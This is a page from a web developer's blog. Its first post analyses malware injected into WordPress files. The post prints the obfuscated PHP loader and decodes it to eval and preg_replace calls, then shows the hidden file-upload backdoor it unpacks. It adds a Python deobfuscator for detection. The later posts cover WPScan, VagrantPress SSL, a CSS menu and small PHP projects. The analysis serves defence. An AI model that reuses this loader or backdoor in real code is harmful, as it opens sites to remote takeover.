closingtags </> – Page 7 – web development and then some
Categories
PHP WordPress

Obscure PHP code in WordPress files

I received word recently that a site I had previously done work on was getting some syntax errors. After checking those errors out, and seeing that certain files were giving the error Warning: Cannot modify header information - headers already sent by (/path/somefile.php) in /path/anotherfile.php, I determined the issue to be malicious PHP code that had been injected into WordPress core files, plugin files, and theme files. How it got there, I can't be entirely certain, but my best guess is that this vulnerability with Gravity Forms had something to do with it.
The code looked something like this:
<?php $JPyf4530 = ")nz.p*q4c2thgem8o7vfl1xy/ibar;(3k6u9j_d05sw";$BYTdA1808 = $JPyf4530[4].$JPyf4530[28].$JPyf4530[13].$JPyf4530[12].$JPyf4530[37].$JPyf4530[28].$JPyf4530[13].$JPyf4530[4].$JPyf4530[20].$JPyf4530[27].$JPyf4530[8].$JPyf4530[13];$xdTQes100 = "\x65".chr(118)."al".chr(40)."".chr(103)."".chr(122)."i".chr(110)."fl".chr(97)."".chr(116)."\x65\x28\x62".chr(97)."\x73".chr(101)."6".chr(52)."_\x64ec".chr(111)."de\x28";$TbQ6628 = "))\x29\x3b";$W1576 = $xdTQes100."'NctBC4IwGIDhv7Ii+ByV5cwKdrYIutVNZMz5DQdOh64oZP+9Ll4f3tfoyIwj+mglrvmzWDJ1wnPCsEq12rNjxpIEK5VV8oBZWrNkWVI6GU2iBVrnv//tcrvnjxlt/0bxcm0va6yFNi3ORQG6g7IAb53opEUoNxDv5DAMsWscUEomVE1PYAucBILtiLOsgYfA8WM8Dz8='".$TbQ6628;$BYTdA1808($JPyf4530[24].$JPyf4530[3].$JPyf4530[5].$JPyf4530[24].$JPyf4530[13], $W1576, "386"); ?>
Looks like a jumbled mess, right? Well, it is, but it's supposed to look like a jumbled mess to anyone who stumbles across it, to intimidate them into just leaving it alone. And even though it looks like a chaotic disaster, it does have functionality. Let's break it down into a few pieces.
<?php
$JPyf4530 = ")nz.p*q4c2thgem8o7vfl1xy/ibar;(3k6u9j_d05sw";
?>
Basically, this is just a string. Or maybe it's better to call it an alphabet: the other variables pick characters out of this string by index. For instance:
$BYTdA1808 = $JPyf4530[4].$JPyf4530[28].$JPyf4530[13].$JPyf4530[12].$JPyf4530[37].$JPyf4530[28].$JPyf4530[13].$JPyf4530[4].$JPyf4530[20].$JPyf4530[27].$JPyf4530[8].$JPyf4530[13];
Which translates to:
$BYTdA1808 = 'preg_replace';
Sneaky, eh? Some of the other variables use ASCII codes (chr() calls and \x escapes) to build the text they want, but overall it's just a way of obscuring code. So we can take this idea, apply it to the rest of the snippet, and come up with something like this:
$W1576 = "eval(gzinflate(base64_decode('NctBC4IwGIDhv7Ii+ByV5cwKdrYIutVNZMz5DQdOh64oZP+9Ll4f3tfoyIwj+mglrvmzWDJ1wnPCsEq12rNjxpIEK5VV8oBZWrNkWVI6GU2iBVrnv//tcrvnjxlt/0bxcm0va6yFNi3ORQG6g7IAb53opEUoNxDv5DAMsWscUEomVE1PYAucBILtiLOsgYfA8WM8Dz8=')));";
preg_replace('/.*/e', $W1576, "386");
That’s essentially what it all boils down to. But what’s with all that encoded nonsense? I ran a var_dump() on it and came back with this little piece of work:
if(isset($_GET["2c7e812eb3fc0265211ebc5ba4e53d21"])){
    if (!empty($_FILES)){
        if (!move_uploaded_file($_FILES['fn']['tmp_name'],'./arrr.php')) {
            echo '-';
        } else {
            echo '+';
        }
    };
    exit;
}
Like I said earlier, I think all of this was possible because of this vulnerability, but I could very well be wrong. It would make sense though, as this hack is attempting to move some files around, and then echo success or failure (+/-).
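As an added example (not the post's code or any project's code), here is a small Python deobfuscator that mechanizes the substitution step described above: it resolves the alphabet-index, chr() and \xNN pieces back into plain strings and flags the usual red flags (eval, gzinflate, base64_decode, preg_replace with the /e modifier). SAMPLE is constructed from the snippet above with the base64 payload replaced by a placeholder; the variable names and alphabet are the post's.

```python
import re

# Tokens of the string-building subset the injected code uses: quoted literals,
# chr(N), $alphabet[N] indexing and bare variables, joined by PHP's '.' operator.
TOKEN = re.compile(r'"((?:\\.|[^"\\])*)"' r"|'((?:\\.|[^'\\])*)'"
                   r'|chr\((\d+)\)|\$(\w+)\[(\d+)\]|\$(\w+)')
ASSIGN_LHS = re.compile(r'\$(\w+)\s*=(?!=)\s*')
CONCAT = re.compile(r'\s*\.\s*')
INDICATORS = ('eval(', 'gzinflate(', 'base64_decode(', 'preg_replace')  # red flags

def token_value(t, env):
    """Resolve one token: quoted literal, chr(N), $alphabet[N] or bare $var."""
    dq, sq, n, arr, idx, var = t.groups()
    if dq is not None:                           # "...": resolve \xNN escapes
        return re.sub(r'\\x([0-9a-fA-F]{2})', lambda m: chr(int(m[1], 16)), dq)
    if sq is not None: return sq                 # '...': taken verbatim
    if n is not None: return chr(int(n))         # chr(N)
    if arr is not None:                          # one character of the alphabet
        return env.get(arr, '')[int(idx):int(idx) + 1] or '?'
    return env.get(var, '')                      # previously resolved variable

def deobfuscate(src):
    """Return (env, chains): resolved variables and every reassembled string."""
    env, chains, pos, target = {}, [], 0, None
    while (t := TOKEN.search(src, pos)):
        lhs = ASSIGN_LHS.match(src, t.start())
        if lhs:                                  # "$name = " opens an assignment
            target, pos = lhs.group(1), lhs.end()
            continue
        parts = []
        while t:                                 # follow the '.' concatenations
            parts.append(token_value(t, env)); pos = t.end()
            dot = CONCAT.match(src, pos)
            t = TOKEN.match(src, dot.end()) if dot else None
        value = ''.join(parts)
        if target: env[target], target = value, None
        if value: chains.append(value)
    return env, chains

def flag(src):
    """Reassembled strings that contain an indicator or a /e (eval) regex modifier."""
    return [c for c in deobfuscate(src)[1]
            if any(i in c for i in INDICATORS) or re.fullmatch(r'/.*/\w*e\w*', c)]

# Constructed sample: the post's injected snippet with its base64 payload swapped
# for a placeholder so the example stays short (it is not the original blob).
SAMPLE = r'''<?php $JPyf4530 = ")nz.p*q4c2thgem8o7vfl1xy/ibar;(3k6u9j_d05sw";
$BYTdA1808 = $JPyf4530[4].$JPyf4530[28].$JPyf4530[13].$JPyf4530[12].$JPyf4530[37].$JPyf4530[28].$JPyf4530[13].$JPyf4530[4].$JPyf4530[20].$JPyf4530[27].$JPyf4530[8].$JPyf4530[13];
$xdTQes100 = "\x65".chr(118)."al".chr(40)."".chr(103)."".chr(122)."i".chr(110)."fl".chr(97)."".chr(116)."\x65\x28\x62".chr(97)."\x73".chr(101)."6".chr(52)."_\x64ec".chr(111)."de\x28";
$TbQ6628 = "))\x29\x3b"; $W1576 = $xdTQes100."'BASE64_PAYLOAD_PLACEHOLDER'".$TbQ6628;
$BYTdA1808($JPyf4530[24].$JPyf4530[3].$JPyf4530[5].$JPyf4530[24].$JPyf4530[13], $W1576, "386"); ?>'''
```

Running flag() over a file returns the reassembled preg_replace, /.*/e and eval(gzinflate(base64_decode(...))) strings, which is what to grep a compromised install for once the pieces are put back together.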

Categories
Plugins Themes WordPress

Checking WordPress with WPScan

If you use WordPress regularly, you know that it is often the target of hacking attempts, and rightfully so. It accounts for nearly a quarter of all websites! Why wouldn’t a hacker want to target WordPress? That, plus the plethora of amateur developers releasing plug-ins and themes with gaping security flaws, makes WordPress an easy win for someone with malicious intent.
You probably already know about the vast list of security plug-ins, that you shouldn’t write down your passwords, that you should use different passwords on every site, etc. I’m not going to list all of those things, because it’s boring and repetitive. I am going to tell you about WPScan though. WPScan does exactly what it sounds like. Scans your WordPress site. Boom. That simple. It’s backed by the guys over at Sucuri so you know it’s legit.
Do yourself a favor and check out WPScan either on their website or just go to the Github repo and clone it. It doesn’t work on Windows, so sorry about that. But it should work with a Mac or Linux machine. The install is pretty simple too. Here’s what I did:
sudo apt-get install libcurl4-gnutls-dev libxml2 libxml2-dev libxslt1-dev ruby-dev build-essential
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
sudo gem install bundler && bundle install --without test
Also, it’s nice to set an alias so you don’t have to be in that directory to run it all the time:
alias wpscan="ruby /home/USERNAMEHERE/Documents/wpscan/wpscan.rb"

That way, you just run wpscan --update or whatever command you want and it works. It'll give you a nice big list of things that you should look into, and tell you a few things you probably didn't know.

Categories
PHP Plugins WordPress

Edit Hopper Update, Now Supports Custom Post Types

I’ve made a few changes to the Edit Hopper WordPress plugin that I developed and I’m glad to say that it now supports Custom Post Types and Posts. Plus, thanks to Jimmy (@sporifolous on Github), it now has an options page to select which posts you want the meta box to show on. So if you’ve got a WordPress site, check it out.
https://github.com/Dilden/Edit-Hopper
Big shout out to @socki03 with his help on cleaning up some code.

Categories
PHP Plugins WordPress

Edit Hopper plugin v1

A long, long time ago, I worked on a website that utilized an almost insane amount of pages and child pages in WordPress. While I was adding content to those pages, I realized that I hated having to click the Pages link in the sidebar of the WordPress admin to go back, and then dig through all of the pages, then click edit, and type in my content. I wanted things to be easier. No, they should have been easier, and much simpler.
I came up with an idea. I’d create a meta-box on the right hand side of the page that was currently being edited, that would contain links to the other pages. This makes things much simpler for bulk editing pages. And I’m happy to say, that I’ve finally finished it and made it available to everyone for free! Right now, it’s just available through Github, but you can download a zip file of it from there as well if need be.
Big shout-out to Brett for all his help on this! Check out his blog here and find him on twitter @Socki.
Here’s the link! Let me know what you think. I’m totally open to contributions as well.

Categories
PHP Plugins Themes WordPress

SSL with VagrantPress

I’m trying to be a better developer. And somewhere in the vastness of the internet, someone told me I should be using Vagrant. So I did. It was cool and I liked it, but then I found out about VagrantPress and it got even easier. You just clone that repo, and start working. Pretty simple really.
But the other day, I was working on something that required an HTTPS connection, and I thought you should know how to do this with VagrantPress.
First, start up your machine and log in via SSH:
vagrant up
vagrant ssh

We’re going to need to do a few things with the SSL certificates, but I promise it’s painless.
sudo make-ssl-cert generate-default-snakeoil --force-overwrite
sudo a2enmod ssl
sudo a2ensite default-ssl.conf
sudo service apache2 reload
Credit for these handy commands goes to vtalbot here. Then, we need to edit a few files.
sudo nano /etc/apache2/sites-enabled/default-ssl.conf
Change DocumentRoot /var/www/html to /vagrant/wordpress. Then we need to tell Apache that it's OK to serve that directory, so run this command:
sudo nano /etc/apache2/apache2.conf
and scroll waaaay down to all of the directives that look like
<Directory /var/www/>
Options Indexes FollowSymLinks
AllowOverride None
Require all granted
</Directory>
and create another one that looks like this
<Directory /vagrant/wordpress/>
Options Indexes FollowSymLinks
AllowOverride All
Require all granted
</Directory>
After all of that, run
sudo service apache2 reload
Also, you’ll want to make sure your .htaccess file looks like this:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTPS} !=on
RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]

RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

</IfModule>
The final step then is to navigate to your WordPress settings > General, and change both URLs to be HTTPS instead of HTTP.
And that should be all there is to it! You should now be able to access https://vagrantpress.dev/ and https://vagrantpress.dev/wp-admin/ problem-free. Of course, your browser will probably tell you the connection isn't trusted, but that's just because you're not using a certificate signed by a trusted authority.
The next step might be to go and change the URL in the WordPress settings, or fiddle with your .htaccess if you want to force the SSL connection, but for basic development purposes, this should get you where you need to go.

Categories
CSS jQuery WordPress

CSS Hamburger Menu

I like the hamburger menu. It makes sense. So this is the one that I use when building a menu for mobile devices.
Here’s the HTML:
<nav id="mobile-navigation" class="site-navigation mobile-navigation" role="navigation">
    <a href="#" class="mobile-menu-link">MENU<span></span></a>
</nav>
And the SCSS:
.mobile-navigation {
display: none;

.mobile-menu-link {
display: block;
position: relative;
width: 90px;
height: 30px;
left: 0;
color: #2f6b68;
font-size: 20px;
text-align: right;
margin: 10px;
@include transition(all, 200ms, ease);

span {
content: " ";
display: block;
position: absolute;
width: 24px;
height: 4px;
left: 50%;
top: 44%;
margin-left: -43px;
background: transparent;
@include transition(all, 200ms, ease);
&:before {
content: " ";
display: block;
position: absolute;
width: 24px;
height: 4px;
background: #2f6b68;
left: 50%;
margin-left: -12px;
transform: rotate(45deg);
top: 0;
@include transition(all, 200ms, ease);
}
&:after {
content: " ";
display: block;
position: absolute;
width: 24px;
height: 4px;
background: #2f6b68;
left: 50%;
margin-left: -12px;
transform: rotate(-45deg);
top: 0;
@include transition(all, 200ms, ease);
}
}
}
.menu-mobile-container {
height: auto;
background-color: #ffffff;
.nav-menu {
position: relative;
z-index: 50;
width: 100%;
.menu-item {
display: block;
margin: 0;
a {
display: block;
border-radius: 0;
}
}
}
}
}
.mobile-navigation.closed {
.mobile-menu-link {
span {
background: #2f6b68;
&:before {
top: -7px;
transform: rotate(0);
}
&:after {
top: 7px;
transform: rotate(0);
}
}
}
.menu-mobile-container {
height: 0;
overflow: hidden;
position: relative;
}
}
Here’s my transition mixin:
@mixin transition($property, $time, $type: ease) {
-webkit-transition: $property $time $type;
-moz-transition:$property $time $type;
-ms-transition:$property $time $type;
-o-transition:$property $time $type;
transition:$property $time $type;
}
And here’s some of the jQuery:
$(document).ready( function() {
    $('.mobile-menu-link').on('click', function(event) {
        event.preventDefault();
        $(this).parent('.mobile-navigation').toggleClass('closed', 200);
    });
});
Now, this toggleClass function is giving a little bit of a delay, so if you can figure out a way of doing all of this without it, I’d be interested in knowing a fix.
I like the animation of the ‘X’ that is provided with this hamburger menu. It’s intuitive and self-explaining.

Categories
CSS HTML5 jQuery Mobile PHP WordPress

Developing with Vagrant

Recently, I’ve been trying to find ways to speed up my development time, and I came across a great video showcasing Vagrant. I could spend a lot of time writing a bunch of mumbo jumbo here for you to read, or you could just watch the video that explains it a thousand times better than I would ever be able to.

Categories
CSS HTML5 jQuery PHP WordPress

DemocracyOS

It’s been pretty slow on the web development front for me lately, but I have discovered something new and interesting. It’s called DemocracyOS. What is DemocracyOS? Oh, I’m so glad you asked. Well it’s an open-sourced platform that aims to bring democracy back into the hands of the people in a way that makes voting on almost anything, very simple.
Just recently, we had some elections here in the US (Nov. 4th, 2014) and supposedly, Republicans took back control of both the House and the Senate because so many young people didn’t turn out to vote. What DemocracyOS intends to do, is bring the voting to you. No more waiting in lines at the polls, trying to get away from work, attempting to figure out where you’re supposed to go to vote, or filling in the circles ever so perfectly on an outdated technology (paper).
It’s supposed to be as simple to install and use as WordPress, although I haven’t quite gotten that far yet. I’ll keep the blog updated with my findings though. Check it out at Github here or the main site here.
And if you want to chat about this stuff, hit me up on Twitter @awebdevguy.

Categories
CSS jQuery

The Perfect Browser Home Page

UPDATE! Google removed the ability to host web pages within Google Drive so my simple and free hosting solution provided here (plus the link to the files) is dead.
I decided a while back that I could do my home page (in browser) better than just the standard google.com page. I tailored an html file especially to my needs, and added in some flair. The page will automatically grab the most recent top post from the subreddit /r/EarthPorn. This subreddit basically just supplies cool wallpapers all day. I hosted the file in Google Drive so that I could sync it across my work computer and home computers in Google Chrome. I used this plugin to open this page on a new tab.
So the actual page is here and if you’d like to download the files and tweak it to however you see fit, you can get those here. Let me know @awebdevguy if you do anything cool, or come up with a better way of doing what I did. I know it can be done better.

Categories
PHP

Day of the Year

The most recent challenge I've completed was to input a date in plain English (e.g. November 19th) and output what day of the year that was (day #323). This was a pretty fun challenge, and was simple enough.
https://www.reddit.com/r/dailyprogrammer/comments/pzo4w/2212012_challenge_13_easy/
<?php
function dayofyear($date, $leap) {
    $datenum = explode(" ", date('m d', strtotime($date)));
    $months = array(31,28,31,30,31,30,31,31,30,31,30,31);
    $day = 0;
    if($leap) {
        $months[1] = 29;
    }
    for ($i=0; $i < intval($datenum[0]) - 1; $i++) {
        $day = $day + $months[$i];
    }
    return $day + $datenum[1];
}
echo dayofyear('November 19th', false);
?>